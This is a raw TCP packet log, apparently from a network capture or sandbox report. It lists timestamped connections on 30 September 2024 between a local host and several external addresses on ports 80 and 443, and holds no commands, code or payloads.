                                                                                                                                                                                                Sep 30, 2024 16:24:18.891746044 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.891793013 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.892293930 CEST49166443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.892316103 CEST44349166104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.905395985 CEST49167443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.905447960 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:18.905494928 CEST49167443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.905669928 CEST49167443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:18.905682087 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:19.402367115 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:19.402734995 CEST49167443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:19.402753115 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:19.403413057 CEST49167443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:19.403419971 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.269747972 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.269882917 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.269939899 CEST49167443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:20.270113945 CEST49167443192.168.2.22104.21.78.54
                                                                                                                                                                                                Sep 30, 2024 16:24:20.270131111 CEST44349167104.21.78.54192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.319564104 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:20.319610119 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.319681883 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:20.320005894 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:20.320019007 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.792197943 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.792313099 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:20.800836086 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:20.800868988 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:20.804505110 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:20.804510117 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:21.608695030 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:21.608787060 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:21.608880043 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:21.608880043 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:21.609728098 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:21.609744072 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:21.628755093 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:21.634310961 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:21.634495974 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:21.634495974 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:21.641230106 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250706911 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250788927 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250802040 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250824928 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250837088 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250849009 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250859976 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250870943 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250874996 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250881910 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250886917 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250894070 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250904083 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250905991 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250916958 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250919104 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250927925 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250946999 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250955105 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256484985 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256536007 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256539106 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256577969 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.256618023 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337863922 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337886095 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337897062 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337948084 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337960005 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337971926 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.337984085 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338012934 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338013887 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338099957 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338110924 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338129997 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.338140965 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339104891 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339114904 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339124918 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339134932 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339147091 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339148998 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339162111 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339175940 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339870930 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339881897 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339893103 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339903116 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339916945 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.339970112 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340018988 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340090036 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340892076 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340903997 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340914011 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340943098 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.340955019 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.341036081 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.341078997 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.343854904 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.343985081 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.409761906 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.409779072 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.409820080 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.422975063 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.422987938 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423036098 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423070908 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423083067 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423093081 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423109055 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423124075 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423353910 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423365116 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423373938 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423522949 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423650980 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423696995 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423707008 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423722029 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423737049 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423748970 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423774958 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423785925 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423796892 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423814058 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.423825026 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424422026 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424432993 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424444914 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424474955 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424485922 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424510956 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424521923 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424532890 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424544096 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424552917 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424562931 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.424577951 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425301075 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425312042 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425322056 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425338984 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425348997 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425353050 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425359011 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425359964 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425370932 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425376892 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425390959 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.425400972 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426192045 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426208019 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426219940 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426239967 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426249981 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426265955 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426278114 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426289082 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426302910 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426306963 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426312923 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426331043 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.426337957 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427051067 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427062035 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427073002 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427100897 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427112103 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427126884 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427136898 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427166939 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.427196026 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489763021 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489795923 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489805937 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489850998 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489878893 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489891052 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489902973 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489906073 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489912987 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.489937067 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509673119 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509686947 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509696007 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509710073 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509721041 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509831905 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509846926 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.509870052 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510092020 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510102987 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510113001 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510123968 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510133982 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510143995 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510145903 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510154963 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510162115 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510164976 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510175943 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510179996 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510200024 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510211945 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510273933 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510766029 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510807037 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510809898 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510817051 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510838985 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.510849953 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:22.546123028 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:22.546170950 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:22.546233892 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:22.546551943 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:22.546570063 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:23.236712933 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:23.236793995 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:23.238146067 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:23.238164902 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:23.239557981 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:23.239572048 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:24.097691059 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:24.097763062 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:24.097852945 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:24.097853899 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:24.097951889 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:24.097975016 CEST44349170172.67.216.244192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:24.097990036 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:24.098016024 CEST49170443192.168.2.22172.67.216.244
                                                                                                                                                                                                Sep 30, 2024 16:24:24.098367929 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:24.108971119 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:24.271703005 CEST804916991.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:24.271796942 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:26.657133102 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:26.663223982 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:26.663295031 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:26.663450956 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:26.669411898 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260016918 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260081053 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260114908 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260129929 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260150909 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260164976 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260164976 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260188103 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260200024 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260221004 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260226011 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260256052 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260258913 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260288954 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260309935 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260323048 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260325909 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260359049 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260375023 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.260400057 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.266427994 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.266489029 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.266566038 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.266633987 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.266740084 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.266788006 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.298069954 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346396923 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346431017 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346462011 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346482992 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346497059 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346517086 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346527100 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346554041 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346558094 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346590042 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346592903 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.346626997 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.347289085 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.347340107 CEST804917191.134.96.177192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:27.347341061 CEST4917180192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:24:27.347372055 CEST804917191.134.96.177192.168.2.22
